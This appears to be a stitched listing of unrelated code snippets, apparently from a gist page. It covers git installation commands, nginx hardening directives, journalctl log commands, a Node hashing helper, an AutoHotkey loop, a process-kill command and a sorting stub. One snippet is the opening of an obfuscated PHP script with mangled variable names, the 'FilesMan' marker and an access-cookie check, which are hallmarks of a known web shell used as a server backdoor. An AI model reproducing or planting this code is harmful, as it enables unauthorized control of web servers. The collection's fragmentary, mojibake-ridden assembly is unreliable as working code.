sudo add-apt-repository ppa:git-core/ppa
sudo apt update
sudo apt install git
sudo add-apt-repository ppa:git-core/ppa
sudo apt update
sudo apt install git
server_tokens off;
HSTS is a security feature that ensures connections to your server occur only over HTTPS, thereby mitigating risks associated with protocol downgrade attacks and improving overall security by enforcing secure connections.
add_header Strict-Transport-Security "max-age=31536000; includeSubDomains; preload";
Read last lines
journalctl -u hris -n 50 -f
Download
journalctl -u hris -S today --no-tail > hris.log
const crypto = require('crypto') | |
const { readFileSync } = require('fs') | |
const getHash = (fileBuffer) => { | |
const hashSum = crypto.createHash('sha256') | |
hashSum.update(fileBuffer) | |
const hex = hashSum.digest('hex') | |
return hex | |
} |
SetTitleMatchMode, 2 | |
Loop | |
{ | |
WinActivate, Chrome | |
Sleep, 5000 | |
} |
// Sort array based on array of sorted IDs | |
let unsorted = [ | |
{ | |
id: 'bcd' | |
}, | |
{ | |
id: 'abc' | |
} | |
] |
<?php | |
$â–› = ""; | |
$â–˜ = true; | |
$▜ = 'UTF-8'; | |
$â–š = 'FilesMan'; | |
$â–™ = md5($_SERVER['HTTP_USER_AGENT']); | |
if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])."key"])) { | |
prototype(md5($_SERVER['HTTP_HOST'])."key", $â–™); | |
} |
killall -9 node |
/** | |
* Generates random string and password hashing | |
* @type {module:crypto} | |
*/ | |
//// Core modules | |
const crypto = require('crypto'); | |
const util = require('util'); | |
//// External modules |